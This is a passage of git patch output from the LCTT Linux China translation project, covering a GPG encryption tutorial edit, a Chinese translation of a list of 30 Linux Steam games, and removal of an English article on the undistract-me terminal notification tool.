+``` $ gpg -e -r "Your Name" /tmp/test.txt ``` @@ -95,34 +92,35 @@ GPG 需要知道这个文件的接收者和发送者。由于这个文件给是 你收到加密文件后,就需要对它进行解密。 你无需指定解密用的密钥。 这个信息被编码在文件中。 GPG 会尝试用其中的密钥进行解密。 -```shel +``` $ gpg -d /tmp/test.txt.gpg ``` ### 发送文件 + 假设你需要发送文件给别人。你需要有接收者的公钥。 具体怎么获得密钥由你自己决定。 你可以让他们直接把公钥发送给你, 也可以通过密钥服务器来获取。 收到对方公钥后,导入公钥到 GPG 中。 -```shell +``` $ gpg --import yourfriends.key ``` -这些公钥与你自己创建的密钥一样,自带了名称和电子邮件地址的信息。 -记住,为了让别人能解密你的文件,别人也需要你的公钥。 因此导出公钥并将之发送出去。 +这些公钥与你自己创建的密钥一样,自带了名称和电子邮件地址的信息。 记住,为了让别人能解密你的文件,别人也需要你的公钥。 因此导出公钥并将之发送出去。 -```shell +``` gpg --export -a "Your Name" > your.key ``` 现在可以开始加密要发送的文件了。它跟之前的步骤差不多, 只是需要指定你自己为发送人。 + ``` $ gpg -e -u "Your Name" -r "Their Name" /tmp/test.txt ``` ### 结语 -就这样了。GPG 还有一些高级选项, 不过你在 99% 的时间内都不会用到这些高级选项。 GPG 就是这么易于使用。 -你也可以使用创建的密钥对来发送和接受加密邮件,其步骤跟上面演示的差不多, 不过大多数的电子邮件客户端在拥有密钥的情况下会自动帮你做这个动作。 + +就这样了。GPG 还有一些高级选项, 不过你在 99% 的时间内都不会用到这些高级选项。 GPG 就是这么易于使用。你也可以使用创建的密钥对来发送和接受加密邮件,其步骤跟上面演示的差不多, 不过大多数的电子邮件客户端在拥有密钥的情况下会自动帮你做这个动作。 -------------------------------------------------------------------------------- @@ -130,7 +128,7 @@ via: https://linuxconfig.org/how-to-encrypt-and-decrypt-individual-files-with-gp 作者:[Nick Congleton][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者 ID](https://github.com/校对者 ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出 From 9277e93482a6e4634e07dd2ba1d4b84eead43473 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 23:53:42 +0800 Subject: [PATCH 0366/1627] PUB:20170215 How to take screenshots on Linux using Scrot.md @zpl1025 --- .../20170215 How to take screenshots on Linux using Scrot.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20170215 How to take screenshots on Linux using Scrot.md (100%) diff --git a/translated/tech/20170215 How to take screenshots on Linux using Scrot.md b/published/20170215 How to take screenshots on Linux using Scrot.md similarity index 100% rename from translated/tech/20170215 How to take screenshots on Linux using Scrot.md rename to published/20170215 How to take screenshots on Linux using Scrot.md From 39c021864df47484a4e8fab0b63b383341212051 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Wed, 6 Dec 2017 16:30:58 -0500 Subject: [PATCH 0367/1627] Translated - Linux games --- ... Games On Steam You Should Play in 2017.md | 246 +++++++++--------- 1 file changed, 121 insertions(+), 125 deletions(-) diff --git a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md index 7a14f92847..f9fadae4ec 100644 --- a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md +++ b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md @@ -1,256 +1,252 @@ -yixunx translating - -30 Best Linux Games On Steam You Should Play in 2017 +2017 年最好的 30 款支持 Linux 的 Steam 游戏 ============================================================ -When it comes to Gaming, a system running on Windows platform is what anyone would recommend. It still is a superior choice for gamers with better graphics driver support and perfect hardware compatibility. But, what about the thought of [gaming on a Linux system][9]? Well, yes, of course – it is possible – maybe you thought of it at some point in time but the collection of Linux games on [Steam for Linux][10] platform wasn’t appealing at all few years back. +说到游戏,人们一般都会推荐使用 Windows 系统。Windows 能提供更好的显卡支持和硬件兼容性,所以对于游戏爱好者来说的确是个更好的选择。但你是否想过[在 Linux 系统上玩游戏][9]?这的确是可能的,也许你以前还曾经考虑过。但在几年之前, [Steam for Linux][10] 上可玩的游戏并不是很吸引人。 -However, that’s not true at all for the current scene. The Steam store now has a lot of great games listed for Linux platform (including a lot of major titles). So, in this article, we’ll be taking a look at the best Linux games on Steam. +但现在情况完全不一样了。Steam 商店里现在有许多支持 Linux 平台的游戏(包括很多主流大作)。我们在本文中将介绍 Steam 上最好的一些 Linux 游戏。 -But before we do that, let me tell you a money saving trick. If you are an avid gamer who spends plenty of time and money on gaming, you should subscribe to Humble Monthly. This monthly subscription program from [Humble Bundle][11] gives you $100 in games for just $12 each month. +在进入正题之前,先介绍一个省钱小窍门。如果你是个狂热的游戏爱好者,在游戏上花费很多时间和金钱的话,我建议你订阅 [Humble 每月包(Humble Monthly)][11]。这是个每月收费的订阅服务,每月只用 12 美元就能获得价值 100 美元的游戏。 -Not all games might be available on Linux though but it is still a good deal because you get additional 10% discount on any games or books you buy from [Humble Bundle website][12]. +这个游戏包中可能有些游戏不支持 Linux,但除了 Steam 游戏之外,它还会让 [Humble Bundle 网站][12]上所有的游戏和书籍都打九折,所以这依然是个不错的优惠。 -The best thing here is that every purchase you make supports a charity organization. So, you are not just gaming, you are also making a difference to the world. +更棒的是,你在 Humble Bundle 上所有的消费都会捐出一部分给慈善机构。所以你在享受游戏的同时还在帮助改变世界。 -### Best Linux games on Steam +### Steam 上最好的 Linux 游戏 -The list of best Linux games on steam is in no particular ranking order. +以下排名无先后顺序。 -Additional Note: While there’s a lot of games available on Steam for Linux, there are still a lot of problems you would face as a Linux gamer. You can refer to one of our articles to know about the [annoying experiences every Linux gamer encounters][14]. +额外提示:虽然在 Steam 上有很多支持 Linux 的游戏,但你在 Linux 上玩游戏时依然可能会遇到各种问题。你可以阅读我们之前的文章:[每个 Linux 游戏玩家都会遇到的烦人问题][14] -Jump Directly to your preferred genre of Games: +可以点击以下链接跳转到你喜欢的游戏类型: -* [Action Games][3] +* [动作类游戏][3] -* [RPG Games][4] +* [角色扮演类游戏][4] -* [Racing/Sports/Simulation Games][5] +* [赛车/运动/模拟类游戏][5] -* [Adventure Games][6] +* [冒险类游戏][6] -* [Indie Games][7] +* [独立游戏][7] -* [Strategy Games][8] +* [策略类游戏][8] -### Best Action Games for Linux On Steam +### Steam 上最佳 Linux 动作类游戏 -### 1\. Counter-Strike: Global Offensive (Multiplayer) +### 1\. 反恐精英:全球攻势(Counter-Strike: Global Offensive)(多人) -CS GO is definitely one of the best FPS games for Linux on Steam. I don’t think this game needs an introduction but in case you are unaware of it – I must mention that it is one of the most enjoyable FPS multiplayer game you would ever play. You’ll observe CS GO is one of the games contributing a major part to the e-sports scene. To up your rank – you need to play competitive matches. In either case, you can continue playing casual matches. +《CS:GO》毫无疑问是 Steam 上支持 Linux 的最好的 FPS 游戏之一。我觉得这款游戏无需介绍,但如果你没有听说过它,我要告诉你这将会是你玩过的最好玩的多人 FPS 游戏之一。《CS:GO》还是电子竞技中的一个主流项目。想要提升等级的话,你需要在天梯上和其他玩家同台竞技。但你也可以选择更加轻松的休闲模式。 -I could have listed Rainbow Six siege instead of Counter-Strike, but we still don’t have it for Linux/Steam OS. +我本想写《彩虹六号:围攻行动》,但它目前还不支持 Linux 或 Steam OS。 -[CS: GO (Purchase)][15] +[购买《CS: GO》][15] -### 2\. Left 4 Dead 2 (Multiplayer/Singleplayer) +### 2\. 求生之路 2(多人/单机) -One of the most loved first-person zombie shooter multiplayer game. You may get it for as low as 1.3 USD on a Steam sale. It is an interesting game which gives you the chills and thrills you’d expect from a zombie game. The game features swamps, cities, cemetries, and a lot more environments to keep things interesting and horrific. The guns aren’t super techy but definitely provides a realistic experience considering it’s an old game. +这是最受欢迎的僵尸主题多人 FPS 游戏之一。在 Steam 优惠时,价格可以低至 1.3 美元。这是个有趣的游戏,能让你体会到你在僵尸游戏中期待的寒意和紧张感。游戏中的环境包括了沼泽、城市、墓地等等,让游戏既有趣又吓人。游戏中的枪械并不是非常先进,但作为一个老游戏来说,它已经提供了足够真实的体验。 -[Left 4 Dead 2 (Purchase)][16] +[购买《求生之路 2》][16] -### 3\. Borderlands 2 (Singleplayer/Co-op) +### 3\. 无主之地 2(Borderlands 2)(单机/协作) -Borderlands 2 is an interesting take on FPS games for PC. It isn’t anything like you experienced before. The graphics look sketchy and cartoony but that does not let you miss the real action you always look for in a first-person shooter game. You can trust me on that! +《无主之地 2》是个很有意思的 FPS 游戏。它和你以前玩过的游戏完全不同。画风看上去有些诡异和卡通化,但我可以保证,游戏体验可一点也不逊色! -If you are looking for one of the best Linux games with tons of DLC – Borderlands 2 will definitely suffice. +如果你在寻找一个好玩而且有很多 DLC 的 Linux 游戏,《无主之地 2》绝对是个不错的选择。 -[Borderlands 2 (Purchase)][17] +[购买《无主之地 2》][17] -### 4\. Insurgency (Multiplayer) +### 4\. 叛乱(Insurgency)(多人) -Insurgency is yet another impressive FPS game available on Steam for Linux machines. It takes a different approach by eliminating the HUD or the ammo counter. As most of the reviewers mentioned – pure shooting game focusing on the weapon and the tactics of your team. It may not be the best FPS game – but it surely is one of them if you like – Delta Force kinda shooters along with your squad. +《叛乱》是 Steam 上又一款支持 Linux 的优秀的 FPS 游戏。它剑走偏锋,从屏幕上去掉了 HUD 和弹药数量指示。如同许多评论者所说,这是款注重武器和团队战术的纯粹的射击游戏。这也许不是最好的 FPS 游戏,但如果你想玩和《三角洲部队》类似的多人游戏的话,这绝对是最好的游戏之一。 -[Insurgency (Purchase)][18] +[购买《叛乱》][18] -### 5\. Bioshock: Infinite (Singleplayer) +### 5\. 生化奇兵:无限(Bioshock: Infinite)(单机) -Bioshock Infinite would definitely remain as one of the best singleplayer FPS games ever developed for PC. You get unrealistic powers to kill your enemies. And, so do your enemies have a lot of tricks up in the sleeves. It is a story-rich FPS game which you should not miss playing on your Linux system! +《生化奇兵:无限》毫无疑问将会作为 PC 平台最好的单机 FPS 游戏之一而载入史册。你可以利用很多强大的能力来杀死你的敌人。同时你的敌人也各个身怀绝技。游戏的剧情也非常丰富。你不容错过! -[BioShock: Infinite (Purchase)][19] +[购买《生化奇兵:无限》][19] -### 6\. HITMAN – Game of the Year Edition (Singleplayer) +### 6\. 《杀手(年度版)》(HITMAN - Game of the Year Edition)(单机) -The Hitman series is obviously one of the most loved game series for a PC gamer. The recent iteration of HITMAN series saw an episodic release which wasn’t appreciated much but now with Square Enix gone, the GOTY edition announced with a few more additions is back to the spotlight. Make sure to get creative with your assassinations in the game Agent 47! +《杀手》系列无疑是 PC 游戏爱好者们的最爱之一。本系列的最新作开始按章节发布,让很多玩家觉得不满。但现在 Square Enix 撤出了开发,而最新的年度版带着新的内容重返舞台。在游戏中发挥你的想象力暗杀你的目标吧,杀手47! -[HITMAN (GOTY)][20] +[购买(杀手(年度版))][20] -### 7\. Portal 2 +### 7\. 传送门 2 -Portal 2 is the perfect blend of action and adventure. It is a puzzle game which lets you join co-op sessions and create interesting puzzles. The co-op mode features a completely different campaign when compared to the single player mode. +《传送门 2》完美地结合了动作与冒险。这是款解谜类游戏,你可以与其他玩家协作,并开发有趣的谜题。协作模式提供了和单机模式截然不同的游戏内容。 -[Portal 2 (Purchase)][21] +[购买《传送门2》][21] -### 8\. Deux Ex: Mankind Divided +### 8\. 杀出重围:人类分裂 -If you are on the lookout for a shooter game focused on stealth skills – Deux Ex would be the perfect addition to your Steam library. It is indeed a very beautiful game with some state-of-the-art weapons and crazy fighting mechanics. +如果你在寻找隐蔽类的射击游戏,《杀出重围》是个完美的选择。这是个非常华丽的游戏,有着最先进的武器和超乎寻常的战斗机制。 -[Deus Ex: Mankind Divided (Purchase)][22] +[购买《杀出重围:人类分裂》][22] -### 9\. Metro 2033 Redux / Metro Last Light Redux +### 9\. 地铁 2033 重置版(Metro 2033 Redux) / 地铁:最后曙光 重置版(Metro Last Light Redux) -Both Metro 2033 Redux and the Last Light are the definitive editions of the classic hit Metro 2033 and Last Light. The game has a post-apocalyptic setting. You need to eliminate all the mutants in order to ensure the survival of mankind. You should explore the rest when you get to play it! +《地铁 2033 重置版》和《地铁:最后曙光 重置版》是经典的《地铁 2033》和《地铁:最后曙光》的最终版本。故事发生在世界末日之后。你需要消灭所有的变种人来保证人类的生存。剩下的就交给你自己去探索了! -[Metro 2033 Redux (Purchase)][23] +[购买《地铁 2033 重置版》][23] -[Metro Last Light Redux (Purchase)][24] +[购买《地铁:最后曙光 重置版》][24] -### 10\. Tannenberg (Multiplayer) +### 10\. 坦能堡(Tannenberg)(多人) -Tannenberg is a brand new game – announced a month before this article was published. The game is based on the Eastern Front (1914-1918) as a part of World War I. It is a multiplayer-only game. So, if you want to experience WWI gameplay experience, look no further! +《坦能堡》是个全新的游戏 - 在本文发表一个月前刚刚发售。游戏背景是第一次世界大战的东线战场(1914-1918)。这款游戏只有多人模式。如果你想要在游戏中体验第一次世界大战,不要错过这款游戏! -[Tannenberg (Purchase)][25] +[购买《坦能堡》][25] -### Best RPG Games for Linux on Steam +### Steam 上最佳 Linux 角色扮演类游戏 -### 11\. Shadow of Mordor +### 11\. 中土世界:暗影魔多(Shadow of Mordor) -Shadow of Mordor is one of the most exciting open world RPG game you will find listed on Steam for Linux systems. You have to fight as a ranger (Talion) with the bright master (Celebrimbor) to defeat Sauron’s army (and then approach killing him). The fighting mechanics are very impressive. It is a must try game! +《中土世界:暗影魔多》 是 Steam 上支持 Linux 的最好的开放式角色扮演类游戏之一。你将扮演一个游侠(塔里昂),和光明领主(凯勒布理鹏)并肩作战击败索隆的军队(并最终和他直接交手)。战斗机制非常出色。这是款不得不玩的游戏! -[SOM (Purchase)][26] +[购买《中土世界:暗影魔多》][26] -### 12\. Divinity: Original Sin – Enhanced Edition +### 12\. 神界:原罪加强版(Divinity: Original Sin – Enhanced Edition) -Divinity: Original is a kick-ass Indie-RPG game that’s unique in itself and very much enjoyable. It is probably one of the highest rated RPG games with a mixture of Adventure & Strategy. The enhanced edition includes new game modes and a complete revamp of voice-overs, controller support, co-op sessions, and so much more. +《神界:原罪》是一款极其优秀的角色扮演类独立游戏。它非常独特而又引人入胜。这或许是评分最高的带有冒险和策略元素的角色扮演游戏。加强版添加了新的游戏模式,并且完全重做了配音、手柄支持、协作任务等等。 -[Divinity: Original Sin (Purchase)][27] +[购买《神界:原罪加强版》][27] -### 13\. Wasteland 2: Director’s Cut +### 13\. 废土 2:导演剪辑版(Wasteland 2: Director’s Cut) -Wasteland 2 is an amazing CRPG game. If Fallout 4 was to be ported down as a CRPG as well – this is what we would have expected it to be. The director’s cut edition includes a complete visual overhaul with hundred new characters. +《废土 2》是一款出色的 CRPG 游戏。如果《辐射 4》被移植成 CRPG 游戏,大概就是这种感觉。导演剪辑版完全重做了画面,并且增加了一百多名新人物。 -[Wasteland 2 (Purchase)][28] +[购买《废土 2》][28] -### 14\. Darkwood +### 14\. 阴暗森林(Darkwood) -A horror-filled top-down view RPG game. You get to explore the world, scavenging materials, and craft weapons to survive. +一个充满恐怖的俯视角角色扮演类游戏。你将探索世界、搜集材料、制作武器来生存下去。 -[Darkwood (Purchase)][29] +[购买《阴暗森林》][29] -### Best Racing/Sports/Simulation Games +### 最佳赛车 / 运动 / 模拟类游戏 -### 15\. Rocket League +### 15\. 火箭联盟(Rocket League) -Rocket League is an action-packed soccer game conceptualized by rocket-powered battle cars. Not just driving the car and heading to the goal – you can even make your opponents go – kaboom! +《火箭联盟》是一款充满刺激的足球游戏。游戏中你将驾驶用火箭助推的战斗赛车。你不仅是要驾车把球带进对方球门,你甚至还可以让你的对手化为灰烬! -A fantastic sports-action game every gamer must have installed! +这是款超棒的体育动作类游戏,每个游戏爱好者都值得拥有! -[Rocket League (Purchase)][30] +[购买《火箭联盟》][30] -### 16\. Road Redemption +### 16\. 公路救赎(Road Redemption) -Missing Road Rash? Well, Road Redemption will quench your thirst as a spiritual successor to Road Rash. Ofcourse, it is not officially “Road Rash II” – but it is equally enjoyable. If you loved Road Rash, you’ll like it too. +想念《暴力摩托》了?作为它精神上的续作,《公路救赎》可以缓解你的饥渴。当然,这并不是真正的《暴力摩托 2》,但它一样有趣。如果你喜欢《暴力摩托》,你也会喜欢这款游戏。 -[Road Redemption (Purchase)][31] +[购买《公路救赎》][31] -### 17\. Dirt Rally +### 17\. 尘埃拉力赛(Dirt Rally) -Dirt Rally is for the gamers who want to experience off-road and on-road racing game. The visuals are breathtaking and the game is enjoyable with near to perfect driving mechanics. +《尘埃拉力赛》是为想要体验公路和越野赛车的玩家准备的。画面非常有魄力,驾驶手感也近乎完美。 -[Dirt Rally (Purchase)][32] +[购买《尘埃拉力赛》][32] ### 18\. F1 2017 -F1 2017 is yet another impressive car racing game from the developers of Dirt Rally (Codemasters & Feral Interactive). It features all of the iconic F1 racing cars that you need to experience. +《F1 2017》是另一款令人印象深刻的赛车游戏。由《尘埃拉力赛》的开发者 Codemasters & Feral Interactive 制作。游戏中包含了所有标志性的 F1 赛车,值得你去体验。 -[F1 2017 (Purchase)][33] +[购买《F1 2017》][33] -### 19. GRID Autosport +### 19. 超级房车赛:汽车运动(GRID Autosport) -GRID is one of the most underrated car racing games available out there. GRID Autosport is the sequel to GRID 2\. The gameplay seems stunning to me. With even better cars than GRID 2, the GRID Autosport is a recommended racing game for every PC gamer out there. The game also supports a multiplayer mode where you can play with your friends – representing as a team. +《超级房车赛》是最被低估的赛车游戏之一。《超级房车赛:汽车运动》是《超级房车赛》的续作。这款游戏的可玩性令人惊艳。游戏中的赛车也比前作更好。推荐所有的 PC 游戏玩家尝试这款赛车游戏。游戏还支持多人模式,你可以和你的朋友组队参赛。 -[GRID Autosport (Purchase)][34] +[购买《超级房车赛:汽车运动》][34] -### Best Adventure Games +### 最好的冒险游戏 -### 20\. ARK: Survival Evolved +### 20\. 方舟:生存进化(ARK: Survival Evolved) -ARK Survival Evolved is a quite decent survival game with exciting adventures following in the due course. You find yourself in the middle of nowhere (ARK Island) and have got no choice except training the dinosaurs, teaming up with other players, hunt someone to get the required resources, and craft items to maximize your chances to survive and escape the Island. +《方舟:生存进化》是一款不错的生存游戏,里面有着激动人心的冒险。你发现自己身处一个未知孤岛(方舟岛),为了生存下去并逃离这个孤岛,你必须去驯服恐龙、与其他玩家合作、猎杀其他人来抢夺资源、以及制作物品。 -[ARK: Survival Evolved (Purchase)][35] +[购买《方舟:生存进化》][35] -### 21\. This War of Mine +### 21\. 这是我的战争(This War of Mine) -A unique game where you aren’t a soldier but a civilian facing the hardships of wartime. You’ve to make your way through highly-skilled enemies and help out other survivors as well. +一款独特的战争游戏。你不是扮演士兵,而是要作为一个平民来面对战争带来的艰难。你需要在身经百战的敌人手下逃生,并帮助其他的幸存者。 -[This War of Mine (Purchase)][36] +[购买《这是我的战争》][36] -### 22\. Mad Max +### 22\. 疯狂的麦克斯(Mad Max) -Mad Max is all about survival and brutality. It includes powerful cars, an open-world setting, weapons, and hand-to-hand combat. You need to keep exploring the place and also focus on upgrading your vehicle to prepare for the worst. You need to think carefully and have a strategy before you make a decision. +生存和暴力概括了《疯狂的麦克斯》的全部内容。游戏中有性能强大的汽车,开放性的世界,各种武器,以及徒手肉搏。你要不断地探索世界,并注意升级你的汽车来防患于未然。在做决定之前,你要仔细思考并设计好策略。 -[Mad Max (Purchase)][37] +[购买《疯狂的麦克斯》][37] -### Best Indie Games +### 最佳独立游戏 -### 23\. Terraria +### 23\. 泰拉瑞亚(Terraria) -It is a 2D game which has received overwhelmingly positive reviews on Steam. Dig, fight, explore, and build to keep your journey going. The environments are automatically generated. So, it isn’t anything static. You might encounter something first and your friend might encounter the same after a while. You’ll also get to experience creative 2D action-packed sequences. +这是款在 Steam 上广受好评的 2D 游戏。你在旅途中需要去挖掘、战斗、探索、建造。游戏地图是自动生成的,而不是静止的。也许你刚刚遇到的东西,你的朋友过一会儿才会遇到。你还将体验到富有新意的 2D 动作场景。 -[Terraria (Purchase)][38] +[购买《泰拉瑞亚》][38] -### 24\. Kingdoms and Castles +### 24\. 王国与城堡(Kingdoms and Castles) -With Kingdoms and Castles, you get to build your own kingdom. You have to manage your kingdom by collecting tax (as funds necessary) from the people, take care of the forests, handle the city +在《王国与城堡》中,你将建造你自己的王国。在管理你的王国的过程中,你需要收税、保护森林、规划城市,并且发展国防来防止别人入侵你的王国。 -design, and also make sure no one raids your kingdom by implementing proper defences. +这是款比较新的游戏,但在独立游戏中已经相对获得了比较高的人气。 -It is a fairly new game but quite trending among the Indie genre of games. +[购买《王国与城堡》][39] -[Kingdoms and Castles][39] +### Steam 上最佳 Linux 策略类游戏 -### Best Strategy Games on Steam For Linux Machines +### 25\. 文明 5(Sid Meier’s Civilization V) -### 25\. Sid Meier’s Civilization V +《文明 5》是 PC 上评价最高的策略游戏之一。如果你想的话,你可以去玩《文明 6》。但是依然有许多玩家喜欢《文明 5》,觉得它更有独创性,游戏细节也更富有创造力。 -Sid Meier’s Civilization V is one of the best-rated strategy game available for PC. You could opt for Civilization VI – if you want. But, the gamers still root for Sid Meier’s Civilization V because of its originality and creative implementation. +[购买《文明 5》][40] -[Civilization V (Purchase)][40] +### 26\. 全面战争:战锤(Total War: Warhammer) -### 26\. Total War: Warhammer +《全面战争:战锤》是 PC 平台上一款非常出色的回合制策略游戏。可惜的是,新作《战锤 2》依然不支持Linux。但如果你喜欢使用飞龙和魔法来建造与毁灭帝国的话,2016 年的《战锤》依然是个不错的选择。 -Total War: Warhammer is an incredible turn-based strategy game available for PC. Sadly, the Warhammer II isn’t available for Linux as of yet. But 2016’s Warhammer is still a great choice if you like real-time battles that involve building/destroying empires with flying creatures and magical powers. +[购买《全面战争:战锤》][41] -[Warhammer I (Purchase)][41] +### 27\. 轰炸小队《Bomber Crew》 -### 27\. Bomber Crew +想要一款充满乐趣的策略游戏?《轰炸小队》就是为你准备的。你需要选择合适的队员并且让你的队伍稳定运转来取得最终的胜利。 -Wanted a strategy simulation game that’s equally fun to play? Bomber Crew is the answer to it. You need to choose the right crew and maintain it in order to win it all. +[购买《轰炸小队》][42] -[Bomber Crew (Purchase)][42] +### 28\. 奇迹时代 3(Age of Wonders III) -### 28\. Age of Wonders III +非常流行的策略游戏,包含帝国建造、角色扮演、以及战争元素。这是款精致的回合制策略游戏,请一定要试试! -A very popular strategy title with a mixture of empire building, role playing, and warfare. A polished turn-based strategy game you must try! +[购买《奇迹时代 3》][43] -[Age of Wonders III (Purchase)][43] +### 29\. 城市:天际线(Cities: Skylines) -### 29\. Cities: Skylines +一款非常简洁的游戏。你要从零开始建造一座城市,并且管理它的全部运作。你将体验建造和管理城市带来的愉悦与困难。我不觉得每个玩家都会喜欢这款游戏——它的用户群体非常明确。 -A pretty straightforward strategy game to build a city from scratch and manage everything in it. You’ll experience the thrills and hardships of building and maintaining a city. I wouldn’t expect every gamer to like this game – it has a very specific userbase. +[购买《城市:天际线》][44] -[Cities: Skylines (Purchase)][44] +### 30\. 幽浮 2(XCOM 2) -### 30\. XCOM 2 +《幽浮 2》是 PC 上最好的回合制策略游戏之一。我在想如果《幽浮 2》能够被制作成 FPS 游戏的话该有多棒。不过它现在已经是一款好评如潮的杰作了。如果你有多余的预算能花在这款游戏上,建议你购买“天选之战(War of the Chosen)“ DLC。 -XCOM 2 is one of the best turn-based strategy game available for PC. I wonder how crazy it could have been to have XCOM 2 as a first person shooter game. However, it’s still a masterpiece with an overwhelming response from almost everyone who bought the game. If you have the budget to spend more on this game, do get the – “War of the Chosen” – DLC. +[购买《幽浮 2》][45] -[XCOM 2 (Purchase)][45] +### 总结 -### Wrapping Up +我们从所有支持 Linux 的游戏中挑选了大部分的主流大作以及一些评价很高的新作。 -Among all the games available for Linux, we did include most of the major titles and some the latest games with an overwhelming response from the gamers. +你觉得我们遗漏了你最喜欢的支持 Linux 的 Steam 游戏么?另外,你还希望哪些 Steam 游戏开始支持 Linux 平台? -Do you think we missed any of your favorite Linux game available on Steam? Also, what are the games that you would like to see on Steam for Linux platform? - -Let us know your thoughts in the comments below. +请在下面的回复中告诉我们你的想法。 -------------------------------------------------------------------------------- via: https://itsfoss.com/best-linux-games-steam/ 作者:[Ankush Das][a] -译者:[译者ID](https://github.com/译者ID) +译者:[yixunx](https://github.com/yixunx) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 40603fd2d9115fb502aa45e6f5be9d7c7f9aa6b8 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 7 Dec 2017 08:58:45 +0800 Subject: [PATCH 0368/1627] translated --- ...Long Running Terminal Commands Complete.md | 156 ------------------ ...Long Running Terminal Commands Complete.md | 154 +++++++++++++++++ 2 files changed, 154 insertions(+), 156 deletions(-) delete mode 100644 sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md create mode 100644 translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md diff --git a/sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md deleted file mode 100644 index 46afe9b893..0000000000 --- a/sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md +++ /dev/null @@ -1,156 +0,0 @@ -translating---geekpi - -Undistract-me : Get Notification When Long Running Terminal Commands Complete -============================================================ - -by [sk][2] · November 30, 2017 - -![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) - -A while ago, we published how to [get notification when a Terminal activity is done][3]. Today, I found out a similar utility called “undistract-me” that notifies you when long running terminal commands complete. Picture this scenario. You run a command that takes a while to finish. In the mean time, you check your facebook and get so involved in it. After a while, you remembered that you ran a command few minutes ago. You go back to the Terminal and notice that the command has already finished. But you have no idea when the command is completed. Have you ever been in this situation? I bet most of you were in this situation many times. This is where “undistract-me” comes in help. You don’t need to constantly check the terminal to see if a command is completed or not. Undistract-me utility will notify you when a long running command is completed. It will work on Arch Linux, Debian, Ubuntu and other Ubuntu-derivatives. - -#### Installing Undistract-me - -Undistract-me is available in the default repositories of Debian and its variants such as Ubuntu. All you have to do is to run the following command to install it. - -``` -sudo apt-get install undistract-me -``` - -The Arch Linux users can install it from AUR using any helper programs. - -Using [Pacaur][4]: - -``` -pacaur -S undistract-me-git -``` - -Using [Packer][5]: - -``` -packer -S undistract-me-git -``` - -Using [Yaourt][6]: - -``` -yaourt -S undistract-me-git -``` - -Then, run the following command to add “undistract-me” to your Bash. - -``` -echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc -``` - -Alternatively you can run this command to add it to your Bash: - -``` -echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc -``` - -If you are in Zsh shell, run this command: - -``` -echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc -``` - -Finally update the changes: - -For Bash: - -``` -source ~/.bashrc -``` - -For Zsh: - -``` -source ~/.zshrc -``` - -#### Configure Undistract-me - -By default, Undistract-me will consider any command that takes more than 10 seconds to complete as a long-running command. You can change this time interval by editing /usr/share/undistract-me/long-running.bash file. - -``` -sudo nano /usr/share/undistract-me/long-running.bash -``` - -Find “LONG_RUNNING_COMMAND_TIMEOUT” variable and change the default value (10 seconds) to something else of your choice. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] - -Save and close the file. Do not forget to update the changes: - -``` -source ~/.bashrc -``` - -Also, you can disable notifications for particular commands. To do so, find the “LONG_RUNNING_IGNORE_LIST” variable and add the commands space-separated like below. - -By default, the notification will only show if the active window is not the window the command is running in. That means, it will notify you only if the command is running in the background Terminal window. If the command is running in active window Terminal, you will not be notified. If you want undistract-me to send notifications either the Terminal window is visible or in the background, you can set IGNORE_WINDOW_CHECK to 1 to skip the window check. - -The other cool feature of Undistract-me is you can set audio notification along with visual notification when a command is done. By default, it will only send a visual notification. You can change this behavior by setting the variable UDM_PLAY_SOUND to a non-zero integer on the command line. However, your Ubuntu system should have pulseaudio-utils and sound-theme-freedesktop utilities installed to enable this functionality. - -Please remember that you need to run the following command to update the changes made. - -For Bash: - -``` -source ~/.bashrc -``` - -For Zsh: - -``` -source ~/.zshrc -``` - -It is time to verify if this really works. - -#### Get Notification When Long Running Terminal Commands Complete - -Now, run any command that takes longer than 10 seconds or the time duration you defined in Undistract-me script. - -I ran the following command on my Arch Linux desktop. - -``` -sudo pacman -Sy -``` - -This command took 32 seconds to complete. After the completion of the above command, I got the following notification. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] - -Please remember Undistract-me script notifies you only if the given command took more than 10 seconds to complete. If the command is completed in less than 10 seconds, you will not be notified. Of course, you can change this time interval settings as I described in the Configuration section above. - -I find this tool very useful. It helped me to get back to the business after I completely lost in some other tasks. I hope this tool will be helpful to you too. - -More good stuffs to come. Stay tuned! - -Cheers! - -Resource: - -* [Undistract-me GitHub Repository][1] - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ - -作者:[sk][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com/author/sk/ -[1]:https://github.com/jml/undistract-me -[2]:https://www.ostechnix.com/author/sk/ -[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ -[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ -[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ 